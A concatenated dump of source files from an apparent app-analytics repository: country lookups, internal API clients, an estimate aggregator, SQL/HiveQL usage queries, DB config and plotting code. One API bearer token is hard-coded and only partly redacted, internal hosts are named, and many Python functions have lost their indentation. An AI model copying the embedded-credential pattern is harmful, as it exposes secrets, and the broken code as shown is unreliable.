143471: u'Vietnam', 143472: u'South Africa', 143473: u'Malaysia',
143474: u'Philippines', 143475: u'Thailand', 143476: u'Indonesia',
143477: u'Pakistan', 143478: u'Poland', 143479: u'Saudi Arabia',
143480: u'Turkey', 143481: u'United Arab Emirates', 143482: u'Hungary',
143483: u'Chile', 143485: u'Panama', 143486: u'Sri Lanka',
143487: u'Romania', 143489: u'Czech Republic', 143491: u'Israel',
143493: u'Kuwait', 143494: u'Croatia', 143495: u'Costa Rica',
143496: u'Slovakia', 143497: u'Lebanon', 143498: u'Qatar',
143499: u'Slovenia', 143501: u'Colombia', 143502: u'Venezuela',
143503: u'Brazil', 143504: u'Guatemala', 143505: u'Argentina',
143506: u'El Salvador', 143507: u'Peru', 143508: u'Dominican Republic',
143509: u'Ecuador', 143510: u'Honduras', 143511: u'Jamaica',
143512: u'Nicaragua', 143513: u'Paraguay', 143514: u'Uruguay',
143515: u'Macau', 143516: u'Egypt', 143517: u'Kazakhstan',
143518: u'Estonia', 143519: u'Latvia', 143520: u'Lithuania',
143521: u'Malta', 143523: u'Moldova', 143524: u'Armenia',
143525: u'Botswana', 143526: u'Bulgaria', 143528: u'Jordan',
143529: u'Kenya', 143530: u'Macedonia', 143531: u'Madagascar',
143532: u'Mali', 143533: u'Mauritius', 143534: u'Niger',
143535: u'Senegal', 143536: u'Tunisia', 143537: u'Uganda',
143538: u'Anguilla', 143539: u'Bahamas', 143540: u'Antigua and Barbuda',
143541: u'Barbados', 143542: u'Bermuda', 143543: u'British Virgin Islands',
143544: u'Cayman Islands', 143545: u'Dominica', 143546: u'Grenada',
143547: u'Montserrat', 143548: u'St. Kitts and Nevis', 143549: u'St. Lucia',
143550: u'St. Vincent and The Grenadines', 143551: u'Trinidad and Tobago', 143552: u'Turks and Caicos',
143553: u'Guyana', 143554: u'Suriname', 143555: u'Belize',
143556: u'Bolivia', 143557: u'Cyprus', 143558: u'Iceland',
143559: u'Bahrain', 143560: u'Brunei', 143561: u'Nigeria',
143562: u'Oman', 143563: u'Algeria', 143564: u'Angola',
143565: u'Belarus', 143566: u'Uzbekistan', 143568: u'Azerbaijan',
143571: u'Yemen', 143572: u'Tanzania', 143573: u'Ghana',
143575: u'Albania', 143576: u'Benin', 143577: u'Bhutan',
143578: u'Burkina Faso', 143579: u'Cambodia', 143580: u'Cape Verde',
143581: u'Chad', 143582: u'Congo', 143583: u'Fiji',
143584: u'Gambia', 143585: u'Guinea-Bissau', 143586: u'Kyrgyzstan',
143587: u'Laos', 143588: u'Liberia', 143589: u'Malawi',
143590: u'Mauritania', 143591: u'Micronesia', 143592: u'Mongolia',
143593: u'Mozambique', 143594: u'Namibia', 143484: u'Nepal',
143595: u'Palau', 143597: u'Papua New Guinea', 143598: u'Sao Tome and Principe',
143599: u'Seychelles', 143600: u'Sierra Leone', 143601: u'Solomon Islands',
143602: u'Swaziland', 143603: u'Tajikistan', 143604: u'Turkmenistan',
143492: u'Ukraine', 143605: u'Zimbabwe'}
def query_stores_dict(x, t):
    # Dispatch to the query_<t> function defined in this module.
    return globals()['query_%s' % t](x)
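# Example (sketch): query_stores_dict(6014, 'category') -> u'Games'
#                   query_stores_dict(143441, 'country') -> u'United States'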
def query_category(x):
return category_dict[int(x)]
def query_market(x):
return market_dict[int(x)]
def query_type(x):
return type_dict[int(x)]
def query_units_type(x):
return units_type_dict[int(x)]
def query_country(x):
return country_dict[int(x)]
def query_date(x):
return x
<file_sep>/evaluation/readme.txt
# Quality Measurement Framework with Drake
Author: <NAME> (<EMAIL>), <NAME> (<EMAIL>)
# Introduction
To measure the quality of a certain estimation, we have to fetch and process the
estimated and real values and compare them.
[Drake](https://github.com/Factual/drake) is used to manage the dependencies
between the steps; it also helps us componentize the workflow.
# Prerequisites
## Clojure and Lein
Drake is built with [Clojure](http://clojure.org/), a programming
language targeting the JVM. Besides the JDK, you have to install Clojure and
Leiningen. On a Mac, the steps are:

```
brew install clojure
brew upgrade --devel leiningen
```
After these two steps, please follow the steps on
[Drake's homepage](https://github.com/Factual/drake) to finish installing.
## External Script
Currently, we rely on an external script to fetch estimates. Because the path of
the script differs from machine to machine, the old approach of
changing the path in the config file is troublesome.
Instead, we recommend symlinking the external script into the `external/` folder. The
content of that folder is not tracked, so everybody can keep his own
version. You only need to create the links once.
Which script should you symlink? It depends on which estimation fetcher you want
to use. Check `py/internal/est_fetcher.py` to see the corresponding
`script_path` setting for the fetcher.
Examples:
- iOS : `ln -s ~/aa/estimation/ios/gen_daily_app_estimates.py external/est_ios.py`
- Android: `ln -s ~/aa/estimation/android/gen_daily_app_estimates.py external/est_android.py`
<file_sep>/aa_au_model/lib/api.py
import pandas as pd
from StringIO import StringIO
import requests
import datetime
def get_external_ids_from_bundles(bundle_ids, market = 'ios'):
"""
get external app ids for bundle ids
bundle_ids: required data frame with bundle ids
:return: dataframe with external ids and bundle ids
"""
bundle_ext_ids = pd.DataFrame()
os = market
if market == 'android':
os = 'google-play'
for i in range((len(bundle_ids)-1) / 100 + 1):
app_bundles = map(str, bundle_ids.ix[0 + i * 100:99 + i * 100].iloc[:,0].values)
app_bundle_string = ','.join(app_bundles)
api_settings = {'codes': app_bundle_string,
'create_new': 'false',
'vertical': 'apps',
'market': market
}
req = requests.request('POST',
'https://api-internal.appannie.com/internal/v1.1/apps/{}/codes2ids'.format(os),
data=api_settings,
headers={'Authorization': 'bearer 6857259eef54a438<KEY>cab'})
df = pd.read_json(StringIO(req.text))
bundle_ext_ids_i = pd.DataFrame()
        for j in range(len(df)):
            data = pd.DataFrame.from_dict(df['items'][j], orient='index').T
            bundle_ext_ids_i = bundle_ext_ids_i.append(data, ignore_index=True)
bundle_ext_ids_i.columns = ('external_id','bundle_id')
bundle_ext_ids = bundle_ext_ids.append(bundle_ext_ids_i, ignore_index=True)
return bundle_ext_ids
def get_int_data(startdate, enddate, ext_ids, granularity = 'monthly', device='all', country = 'US', feed = 'downloads'):
"""
get int data
ext_ids: required data frame with external app ids
:param startdate:
:param enddate:
:param country: an iso code for 1 country
:param granularity: 'monthly', 'weekly', 'daily'
:param device: 'all' or 'android'
:return: dataframe with external ids and bundle ids
"""
    assert 'external_id' in ext_ids.columns and 'bundle_id' in ext_ids.columns, 'ext_ids must contain external_id and bundle_id columns'
os = device
if device == 'android':
os = 'google-play'
elif device == 'all':
os = 'ios'
else:
raise ValueError('Make sure device = \"android\" or \"all\"')
api_settings = {'countries': country,
'feeds': feed,
'device': device,
'granularity': granularity,
'start_date': datetime.datetime.strptime(startdate, '%Y%m%d').strftime('%Y-%m-%d'),
'end_date': datetime.datetime.strptime(enddate, '%Y%m%d').strftime('%Y-%m-%d')
}
int_data = pd.DataFrame()
for app_id in ext_ids['external_id']:
        if not pd.isnull(app_id):
req_test = requests.request('GET',
'https://api.appannie.com/v1.1/intelligence/apps/{}/app/'.format(os) + str(int(app_id)) + '/history',
params=api_settings,
headers={'Authorization': 'bearer <KEY>'})
df = pd.read_json(StringIO(req_test.text))
app_download_data = pd.DataFrame()
for i in df.list:
data = pd.DataFrame.from_dict(i, orient='index').T
app_download_data = app_download_data.append(data, ignore_index=True)
app_dl_temp = pd.merge(app_download_data, df, left_index=True, right_index=True)
int_data = int_data.append(app_dl_temp, ignore_index=True)
int_data = int_data[int_data.estimate != 'N/A']
int_data = int_data[['device','country','estimate','date','product_id','product_name']]
int_data.columns = ['device','country',api_settings['feeds'],'date','external_id','product_name']
int_data['granularity'] = granularity
return int_data
def get_ios_leaderboards(date, device, feed, country='US', ranks=400, granularity= 'daily'):
"""
Get leaderboards
:param date:
:param device: iphone | ipad | ios | android
:param feed: free | paid | grossing
:param granularity: monthly | weekly | daily
    :return: DataFrame with the leaderboard rows
"""
api_settings = {'countries': country,
'categories': 'Overall',
'feeds': feed,
'ranks': ranks,
'granularity': granularity,
'date': date,
'device': device
}
req_test = requests.request('GET',
'https://api.appannie.com/v1.1/intelligence/apps/ios/ranking',
params=api_settings,
headers={'Authorization': 'bearer <KEY>'})
df = pd.read_json(StringIO(req_test.text))
leaderboards = pd.DataFrame()
for i in df.list:
data = pd.DataFrame.from_dict(i, orient='index').T
leaderboards = leaderboards.append(data, ignore_index=True)
leaderboards = leaderboards[['product_id','rank','feed','category','product_category','estimate','product_name']]
leaderboards['country'] = country
leaderboards['device'] = device
leaderboards['date'] = date
leaderboards['granularity'] = granularity
return leaderboards
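# Example usage (sketch; assumes the bearer tokens above are valid and the
# bundle id is hypothetical):
#   bundles = pd.DataFrame({'bundle_id': ['com.example.app']})
#   ext_ids = get_external_ids_from_bundles(bundles, market='ios')
#   downloads = get_int_data('20150601', '20150630', ext_ids, granularity='monthly')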
<file_sep>/old_investigations/internal/monthly_concater.py
"""
For aggregate the raw data that Mark's script provides.
For Mark's script, the parameters and output are:
- Parameters:
-s[store] -f[feed] -d[date]
- Output example:
category_id,rank,app_id,estimate
36,1,432849519,25006
36,2,419396407,23158
36,3,343200656,22141
Mark's script queries on a daily basis; this script wraps it to provide
monthly output, generating files with complete fields and normalized
filenames. Real units will be added.
"""
#Author: <NAME> <<EMAIL>>
import sys
import os
import os.path
import subprocess
import config
from dateutil import rrule
from dateutil.relativedelta import relativedelta
from datetime import date
import pandas as pd
from joblib import Parallel, delayed
import stores_dict
RAW_ESTIMATION_DIR = "./cache/raw_estimation"
DAILY_SCRIPT_PATH = config.daily_estimate_script_path
REFERENCE_FILE_FORMAT = './cache/references/real_units_%s_%s_%s.csv'
FEEDS = {'Downloads': [0, 1, 100, 101],
'USD': [2, 102]}
def concat_and_save_all_days_and_feeds_in_month(opts, n_jobs=1):
"""
Arguments:
- `opts`:
"""
store = opts.store
year_month = opts.year_month
overwrite = opts.overwrite
year_month_split = year_month.split('-')
year_month_split = map(int, year_month_split)
dtstart = date(year_month_split[0], year_month_split[1], 1)
dtend = dtstart + relativedelta(months=+1) + relativedelta(days=-1)
stacked_df = []
units_type = opts.units_type
# We need to gather all the feeds in order to decide the device of the app.
outfile = './cache/monthly/%s_%s_%s.csv' % (stores_dict.query_country(store), year_month, units_type)
if not overwrite and os.path.exists(outfile):
print('Monthly cache exists. Use cached version. %s' % outfile)
return
# We have to concat every feed in the same units type
for feed in FEEDS[units_type]:
dts = map(lambda x: str(x.date()),
rrule.rrule(rrule.DAILY, dtstart=dtstart, until=dtend))
current_df = Parallel(n_jobs=n_jobs)(delayed(_run_daily_basis_script)(store, feed, dt, overwrite)
for dt in dts)
stacked_df += current_df
stacked_df = pd.concat(stacked_df)
# Add real units to the data
real_units_df = pd.read_csv(REFERENCE_FILE_FORMAT % (opts.store, opts.year_month, units_type))
# Use inner join, because we only care the case where we have estimation and real values.
print('Merging data from all the days in this month...')
merged = pd.merge(stacked_df, real_units_df, on=['app_id', 'date'], how='inner')
# Change the column name from the database.
if units_type == 'USD':
merged.rename(columns={'revenue': 'units'}, inplace=True)
merged.sort_index(by=['date']).to_csv(outfile, index=False)
def _run_daily_basis_script(store, feed, dt, overwrite=False):
"""Run Mark's script with the parameters.
All parameters are `str`.
"""
cmd = "python %s -s %s -f %s -d %s" % (DAILY_SCRIPT_PATH, store, feed, dt)
# Write the csv to a temp file.
csv_filename = os.path.join(RAW_ESTIMATION_DIR, "%s_%s_%s.csv" % (store, feed, dt))
if not overwrite and os.path.exists(csv_filename):
print('Cache exists. Use cached version. %s' % csv_filename)
return pd.read_csv(csv_filename)
try:
print("Running the cmd: %s" % cmd)
child = subprocess.Popen(cmd.split(" "), stdout=subprocess.PIPE)
stdout_value, stderr_value = child.communicate()
ret = child.returncode
print("Ret!!!", ret)
if ret is None or ret >= 2 or (stderr_value is not None and 'Error' in stderr_value):
raise Exception("Have problem fetching daily estimation: %s" % cmd)
with open(csv_filename, 'w') as outfile:
outfile.write(stdout_value)
except Exception as e:
print(e)
if os.path.exists(csv_filename):
os.remove(csv_filename)
sys.exit(2)
# Pass meta-information for refine the csv.
info = {}
info["store_id"] = store
info["feed_id"] = feed
info["date"] = dt
refined_csv = _refine_csv_file(csv_filename, info)
refined_csv.to_csv(csv_filename, index=False)
return refined_csv
def _refine_csv_file(filename, info):
"""Load the csv file, add more fields (make it complete).
"""
df = pd.read_csv(filename)
for k, v in info.iteritems():
df[k] = v
return df
<file_sep>/int-vs-m-benchmark/sql/android/1001b1-market-rankings.sql
/*
DESCRIPTION : collect daily rankings
INPUT TABLE(S) : market.rankings
temp.settings_appstore_instances
temp.settings_rankcategories
temp.settings_exchange_rates
INTERIM TABLE(S) : n/a
OUTPUT TABLE(S) : temp.rankings
QUERY STEPS      : Get all rankings for the given date.
*/

/* Find all relevant rankings for the given date
Note that there can be multiple applications for a given (country,
type, category, rank) for Google Play. This is caused by collecting
the ranking data using multiple devices and getting multiple apps for the
same rank. The primary key is therefore on (country, type, category, rank
application) instead of (country, type, category, rank) as is done for
Apple App Store.
Not all countries have all types (free/paid/gross) of rankings;
this requires the join between settings_rankcategories and settings_appstore_instances on type
*/
DROP TEMPORARY TABLE IF EXISTS temp.rankings;
CREATE TEMPORARY TABLE temp.rankings(
date date NOT NULL,
country_id smallint(5) unsigned NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
category_id smallint(5) unsigned NOT NULL,
rank smallint(5) unsigned NOT NULL,
application_id int(10) unsigned NOT NULL,
price_usd decimal(9,2) NOT NULL,
CONSTRAINT PRIMARY KEY (
date,
country_id,
type,
category_id,
rank,
application_id
),
INDEX i (
date,
country_id,
type,
application_id
)
)
AS
SELECT
sai.country_id,
src.type,
src.category_id,
r.rank,
r.application_id,
ROUND(IF(r.price IS NULL, 0, r.price / ser.rate), 2) AS price_usd,
w.date
FROM market.rankings r FORCE INDEX (PRIMARY)
JOIN temp.settings_appstore_instances sai
ON r.appstore_instance_id = sai.appstore_instance_id
JOIN temp.settings_rankcategories src
ON r.rankcategory_id = src.rankcategory_id
AND sai.type = src.type
JOIN
temp.settings_day_weights w
on DATE_ADD(w.date, INTERVAL 2 DAY) = r.date
LEFT JOIN temp.settings_exchange_rates ser
ON r.currency_id = ser.id
;
<file_sep>/aa_au_model/mdm/sql/emr_mdm_all_usage.sql
-- See the table definitions in aa-data-science/aa_au_model/hive_ql (HiveQL tables backed by S3).
-- iOS uses mdm_fact_app_days_running, Android uses mdm_fact_app_screen_time
set hive.exec.dynamic.partition.mode = nonstrict;
drop table if exists devices_ios;
create table devices_ios
as
select
s.date as period_date,
s.guid_key,
g.guid,
g.device_platform,
o.iso_country_code,
d.device_type
from
mdm_sample_selected_device_weekly s
join mdm_dim_operator o
on s.operator_key = o.operator_key
join mdm_dim_device d
on s.device_key = d.device_key
join mdm_dim_guid g
on s.guid_key = g.guid_key
where
o.iso_country_code in ('us', 'gb', 'jp' ,'kr')
and s.datestr between '2015-09-13' and '2015-10-31'
and d.device_type != 'unknown'
and g.device_platform = 'ios'
;
drop table if exists mdm_usage_ios;
create table mdm_usage_ios (
date date,
guid_key int,
guid string,
bundle_id string,
device_platform string,
iso_country_code string,
device_type string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/mdm/usage_ios'
;
insert overwrite table mdm_usage_ios
select
/*+ STREAMTABLE(devices) */
devices.period_date as date,
devices.guid_key,
max(devices.guid) as guid,
m.bundle_id,
max(devices.device_platform) as device_platform,
max(devices.iso_country_code) as iso_country_code,
max(devices.device_type) as device_type
from devices_ios devices
join mdm_sample_app_days_running m
on m.date between '2015-05-20' and '2015-06-30'
and m.bundle_id not rlike '^(com.mobidia.My-Data-Mgr|com.mobidia.android.mdm|com.vpndefender|com.smartsense.vpndefender).*'
-- Join daily usage with proper end date by adding the number of
-- days to the next Saturday to the daily date
-- As the Saturday is the 6th day, shift all days with 1 day to
-- easily compute the distance
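-- Worked example (sketch): m.date = '2015-06-21' (a Sunday) is shifted to
-- '2015-06-22', whose 'u' day-of-week is 1, so 7 - 1 = 6 days are added
-- and the period ends on '2015-06-27', the next Saturday.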
and devices.period_date = date_add(m.date,
cast(7 -
from_unixtime(unix_timestamp(date_add(m.date, 1), 'yy-MM-dd'), 'u')
as int
)
)
and devices.guid_key = m.guid_key
group by
devices.period_date,
devices.guid_key,
m.bundle_id
;
-- Android
drop table if exists devices_android;
create table devices_android
as
select
s.date as period_date,
s.guid_key,
g.guid,
g.device_platform,
o.iso_country_code,
d.device_type
from
mdm_sample_selected_device_weekly s
join mdm_dim_operator o
on s.operator_key = o.operator_key
join mdm_dim_device d
on s.device_key = d.device_key
join mdm_dim_guid g
on s.guid_key = g.guid_key
where
o.iso_country_code in ('us', 'gb', 'jp' ,'kr')
and s.datestr between '2015-06-01' and '2015-06-30'
and d.device_type != 'unknown'
and g.device_platform = 'android'
;
drop table if exists mdm_usage_android;
create table mdm_usage_android (
date date,
guid_key int,
guid string,
bundle_id string,
device_platform string,
iso_country_code string,
device_type string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/mdm/usage_android'
;
insert overwrite table mdm_usage_android
select
/*+ STREAMTABLE(devices) */
devices.period_date as date,
devices.guid_key,
max(devices.guid) as guid,
m.bundle_id,
max(devices.device_platform) as device_platform,
max(devices.iso_country_code) as iso_country_code,
max(devices.device_type) as device_type
from devices_android devices
join mdm_sample_app_screen_time m
on m.date between '2015-05-20' and '2015-06-30'
and m.bundle_id not rlike '^(com.mobidia.My-Data-Mgr|com.mobidia.android.mdm|com.vpndefender|com.smartsense.vpndefender).*'
-- Join daily usage with proper end date by adding the number of
-- days to the next Saturday to the daily date
-- As the Saturday is the 6th day, shift all days with 1 day to
-- easily compute the distance
and devices.period_date = date_add(m.date,
cast(7 -
from_unixtime(unix_timestamp(date_add(m.date, 1), 'yy-MM-dd'), 'u')
as int
)
)
and devices.guid_key = m.guid_key
group by
devices.period_date,
devices.guid_key,
m.bundle_id
;
drop table if exists devices_android;<file_sep>/exact-matching-improvement/icon_lib/config.py
DISTIMO_DB_PARAMETERS = {
'host': 'mm3',
'port': 3306,
'user': 'henk',
'passwd': '<PASSWORD>'}
APPANNIE_DB_PARAMETERS = {
'host': 'ds-rds-2.crlexxwtzodp.us-east-1.rds.amazonaws.com',
'user': '',
'password': ''
}
DISTIMO_MATCHED_APPLICATIONS_TABLE = 'app_matching_dev.matched_applications_icons'
DISTIMO_MATCHES_TABLE = 'app_matching_dev.icon_matches'
ICON_DIR = 'icons/'
N_PARALLEL_SCRAPING = 4
DEFAULT_HASH_TYPE = 'dhash'
DEFAULT_HASH_SIZE = 12
DEFAULT_HASHING_POOL_SIZE = 4
<file_sep>/aa_au_model/hiveql_scripts/get_countries_per_device.sql
-- get the countries per device from app session data
-- change the date range and the S3 output folder for your environment
DROP TABLE country_devices;
CREATE TABLE country_devices
AS
SELECT datestr, device_id, country
FROM vpn_sample_data_session
WHERE datestr >= '2015-01-10'
AND datestr <= '2015-01-31'
GROUP BY datestr, device_id, country
;
DROP TABLE csvexport;
CREATE TABLE csvexport (
`datestr` string,
`device_id` string,
`country` string)
row format delimited fields terminated by '\t'
lines terminated by '\n'
STORED AS TEXTFILE
LOCATION 's3://aardvark-prod-pdx-ds-workspace/outputfolder'
;
INSERT OVERWRITE TABLE csvexport
SELECT * FROM country_devices
;<file_sep>/evaluation/py/aggregate_daily.py
import sys
import os
import os.path
import pandas as pd
import numpy as np
def main():
input_dir = sys.argv[1]
output_dir = sys.argv[2]
for f in filter(lambda s: s.endswith('.csv'), os.listdir(input_dir)):
full_path = os.path.join(input_dir, f)
df = _aggregate_daily(pd.read_csv(full_path))
df.to_csv(os.path.join(output_dir, f), index=False)
def _aggregate_daily(df):
potential_drops = ['date', 'rank']
potential_groups = ['app_id', 'feed_id', 'category_id']
potential_aggregate_strategies = {
'estimate': np.nansum, 'units': np.nansum
}
aggregate_strategies = {i: potential_aggregate_strategies[i]
for i in potential_aggregate_strategies.iterkeys()
if i in df.columns}
drops = [c for c in df.columns if c in potential_drops]
groups = [c for c in df.columns if c in potential_groups]
grouped = df.drop(drops, axis=1).groupby(groups)
agg = grouped.aggregate(aggregate_strategies)
return agg.reset_index()
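# Example (sketch): two daily rows for the same (app_id, feed_id, category_id)
# with estimates 100 and 150 collapse into a single row with estimate 250;
# 'date' and 'rank' are dropped before grouping.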
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/mdm/mdm/data.py
import glob
import pandas as pd
DIM_GUID_FOLDER = '/s3mnt-projecta/aardvark-prod-pdx-mdm-interface/dimension/MDM_DIM_GUID/'
DIM_GUID_COLS = [
'guid_key', 'guid', 'device_platform', 'latest_imei', 'latest_legacy_hash', 'latest_phone_hash',
'latest_imsi_hash', 'initial_product_key', 'latest_product_key', 'latest_device_key',
'latest_sim_operator_key', 'latest_serving_operator_key', 'latest_data_transfer_at',
'latest_checkin_at', 'latest_os_version_key', 'created_at', 'updated_at'
]
GUID_HASH_FOLDER = '/s3mnt-projecta/aardvark-prod-pdx-ds-sample/MDM_GUID_HASH/'
GUID_HASH_COLS = [
'guid', 'guid_hash', 'platform',
]
def load_dim_guid():
"""
Load all data from DIM_GUID table.
:return: pd.DataFrame with DIM GUID info
"""
paths = glob.glob(DIM_GUID_FOLDER + 'data*')
dim_guid = pd.concat((pd.read_table(p, names=DIM_GUID_COLS) for p in paths),
axis=0, ignore_index=True)
return dim_guid
def load_guid_hash():
"""
Load all data from GUID HASH table.
:return: pd.DataFrame with GUID HASH info
"""
paths = glob.glob(GUID_HASH_FOLDER + 'part*')
guid_hash = pd.concat((pd.read_table(p, names=GUID_HASH_COLS) for p in paths),
axis=0, ignore_index=True)
return guid_hash
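# Example usage (sketch): join MDM guids to their hashes
#   dim_guid = load_dim_guid()
#   guid_hash = load_guid_hash()
#   merged = dim_guid.merge(guid_hash, on='guid', how='inner')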
def load_country_usage_redshift(iso_code, time_frame='weekly', data_folder='data/'):
"""
Load MDM usage for a country.
:param iso_code: Two letter iso code
:param time_frame: 'weekly' or 'monthly'
:param data_folder: Path to folder to load data from
    :return: DataFrame with MDM usage
"""
def load_df(p):
d = pd.read_csv(p)
# Rename columns to align with VPN
d.rename(columns={'package': 'bundle_id', 'guid_key': 'device_id',
'device_type_snapshot': 'device_type'},
inplace=True)
d['bundle_id'] = d.bundle_id.str.rstrip('/')
return d
expression = (data_folder + '_'.join(('mdm_usage', time_frame, iso_code))
+ '*.csv')
paths = glob.glob(expression)
df = pd.concat((load_df(p) for p in paths), axis=0)
date_str_formatter = lambda x: '{}-{}-{}'.format(x[:4], x[4:6], x[6:])
is_valid_device = df.device_type.isin(['tablet', 'smartphone'])
df = df[is_valid_device]
df['date'] = df.date.astype(str).apply(date_str_formatter)
df['platform'] = df.platform.astype('category')
df['device_type'] = df.device_type.astype('category')
df.sort(['date', 'device_id', 'bundle_id'], inplace=True)
return df<file_sep>/old_investigations/android/plot_80_20.R
#!/usr/bin/env Rscript
library(ggplot2)
library(scales)
source("internal/plot_common.R")
r <- read_csv_and_metainfo_from_arg()
df = r$df
metainfo = r$metainfo
max_day = max(df$both_real_estimate_num, na.rm=TRUE)
# Select only when we have max days
sub_df= subset(df, (both_real_estimate_num == max_day))
sub_df= subset(sub_df, estimate_overall>0)
print("Shape beforing selecting.")
print(dim(df))
print("Shape after selecting.")
print(dim(sub_df))
df = sub_df
estimation <- c("estimate_games", "estimate_avg", "estimate_dailybest", "estimate_dailyworst")
size <- c(1, 1, 0.5, 0.5)
differences = seq(0.01, 1, by=.025)
stacked_df = data.frame()
for (unit in c("Downloads", "USD")) {
current_df = subset(df, Unit==unit)
## Iterate the estimations
for (i in 1:length(estimation)) {
current_esti= estimation[i]
rel_errors = abs(current_df[[current_esti]] - current_df[['units_avg']]) / current_df[['units_avg']]
apps_percent = sapply(differences, function(x) sum(rel_errors <= x, na.rm=TRUE) / length(rel_errors))
apps_num = dim(current_df)[1]
print(apps_num)
new_df = data.frame(apps_percent, differences, estimation=current_esti, size=size[i], unit=unit, apps_num)
stacked_df = rbind(stacked_df, new_df)
}
}
plot <- plot_80_20(stacked_df, metainfo)
ggsave(plot, file=paste('plots/',
paste(metainfo$country, metainfo$period, 'plots.png', sep='_'), sep=''),
width=8, height=5)
<file_sep>/exact-matching-improvement/lib/plotting.py
__author__ = 'jjanssen, srhmtonk'
import matplotlib.pyplot as plt
import sklearn.metrics as me
import pandas as pd
import numpy as np
def generate_precision_vs_recall_plot(df, label, metric, metric_y_label):
precision, recall, thresholds = me.precision_recall_curve(df[label], df[metric])
fig = plt.figure()
plt.plot(thresholds, precision[:-1], label="precision")
plt.plot(thresholds, recall[:-1], label="recall")
plt.xlabel(metric_y_label)
plt.legend(loc="lower right")
return fig
def generate_roc_plot(df, label, metric, metric_title_name, xlim_low=0.0, xlim_high=1.0):
fpr, tpr, roc_threshold = me.roc_curve(df[label], df[metric])
auc = round(me.auc(fpr, tpr), 4)
fig = plt.figure()
plt.title("ROC plot for " + metric_title_name + ", AUC: " + str(auc))
plt.plot(fpr, tpr)
plt.xlabel('False positive ratio')
plt.ylabel('True positive ratio')
plt.xlim([xlim_low, xlim_high])
return fig, roc_threshold
def generate_hist_plot(df, metric, metric_title_name):
# split matches in matches and non matches
matches_levenshtein_ratio = df[df.is_a_match == 1][metric]
non_matches_levenshtein_ratio = df[df.is_a_match == 0][metric]
# determine how to weigh entries to get properly normalized histograms
matches_weights = np.ones_like(matches_levenshtein_ratio)/len(matches_levenshtein_ratio)
non_matches_weights = np.ones_like(non_matches_levenshtein_ratio)/len(non_matches_levenshtein_ratio)
# do plotting
fig = plt.figure()
plt.hist([matches_levenshtein_ratio, non_matches_levenshtein_ratio],
label=['matches', 'non matches'], alpha=0.6, weights=[matches_weights, non_matches_weights])
plt.xlabel(metric_title_name)
plt.ylabel('Probability')
plt.title("Normalized histogram plot for " + metric_title_name)
plt.legend(loc="upper right")
plt.close(fig)
return fig
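
# ---------------------------------------------------------------------------
# Usage sketch (illustrative, not part of the original pipeline): drive the
# helpers above with a synthetic labelled DataFrame. The column names
# 'is_a_match' and 'levenshtein_ratio' are assumptions for this demo only,
# following the conventions used in generate_hist_plot.
if __name__ == '__main__':
    np.random.seed(0)
    demo = pd.DataFrame({'is_a_match': np.random.randint(0, 2, 1000)})
    # score loosely correlated with the label so the curves are non-trivial
    demo['levenshtein_ratio'] = 0.5 * demo.is_a_match + 0.5 * np.random.rand(1000)
    roc_fig, _ = generate_roc_plot(demo, 'is_a_match', 'levenshtein_ratio',
                                   'levenshtein ratio')
    pr_fig = generate_precision_vs_recall_plot(demo, 'is_a_match',
                                               'levenshtein_ratio',
                                               'levenshtein ratio threshold')
    roc_fig.savefig('roc_demo.png')
    pr_fig.savefig('pr_demo.png')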
<file_sep>/ranking_change/correlations.py
#!/usr/bin/env python
import scipy.stats
import itertools
import config
import sys
import time
import csv
import datetime
import pandas as pd
import matplotlib.pyplot as plt
import math
import psycopg2
import numpy as np
import matplotlib.cm as cm
import matplotlib.dates as mdates
from itertools import cycle
import datetime as dt
import os.path
GREE_RANKING_FILES_PATH = '/Users/perezrafael/appannie/data/csv_ranks/unziped' if len(sys.argv) != 2 else sys.argv[1]
if not os.path.isdir(GREE_RANKING_FILES_PATH):
print 'Expecting gree ranking files in directory %s' % GREE_RANKING_FILES_PATH
print 'You can specify it in sys.argv[1]'
sys.exit(2)
CONN = None
def get_connection():
global CONN
if CONN is None:
CONN = psycopg2.connect('dbname=aa_staging_small user=aa host=nile')
return CONN
def read_sales(date, store_id, value_type, table_name):
conn = get_connection()
cur = conn.cursor()
sql = 'SELECT app_id, %s FROM %s WHERE date = %%s AND store_id = %%s' % (value_type, table_name)
params = (date, store_id)
cur.execute(sql, params)
print cur.mogrify(sql, params)
for app_id, value in cur:
yield {'App ID': app_id, 'Value': value}
cur.close()
def add_f_date(df):
df2 = df[['Date']].drop_duplicates()
df2['f_date'] = [dt.datetime.strptime(d,'%Y-%m-%d').date() for d in df2['Date']]
df = df.merge(df2, on='Date')
return df
def try_mkdir(path):
try:
os.mkdir(path)
except OSError, e:
if e.errno != 17:
raise
def plot_multi_category_correlation(df):
try_mkdir('plots')
gdf = df.groupby(['Country_Name', 'Market', 'Value_Type', 'Rank_Type'])
for n,g in gdf:
plt.clf()
fig = plt.figure(figsize=(36,12))
ax = fig.add_subplot(111)
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator())
gdf2 = g.groupby(['Category'])
p = []
categories = []
lines = ["-","--","-.",":"]
linecycler = cycle(lines)
colors = iter(cm.rainbow(np.linspace(0, 1, len(gdf2))))
max_rank_shift = 0
for n2, g2 in gdf2:
pa, = plt.plot(g2['f_date'].values, g2['Correlation'], next(linecycler), linewidth=3, color=next(colors))
p.append(pa)
categories.append(n2)
plt.gcf().autofmt_xdate()
ax.grid()
ax.legend(p, categories, loc='center left', bbox_to_anchor=(1, 0.5))
plt.title(str(n))
plt.savefig('plots/correlation_%s.png'%('_'.join(n)))
#plt.show()
def plot_correlation(df):
try_mkdir('plots')
gdf = df.groupby(['Country_Name', 'Market', 'Category', 'Value_Type', 'Rank_Type'])
for n,g in gdf:
plt.clf()
#fig = plt.figure()
#fig = plt.figure(figsize=(36,12))
fig = plt.figure(figsize=(int(len(g['Date'].drop_duplicates())/2),6))
ax = fig.add_subplot(111)
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator())
plt.plot(g['f_date'].values, g['Correlation'], linewidth=3)
plt.gcf().autofmt_xdate()
ax.grid()
plt.ylim(-1.0, -0.4)
plt.title(str(n))
plt.savefig('plots/correlation_%s.png'%('_'.join(n)))
#plt.show()
def make_date_range(start_date_inclusive, end_date_inclusive):
assert start_date_inclusive <= end_date_inclusive
def create():
d = start_date_inclusive
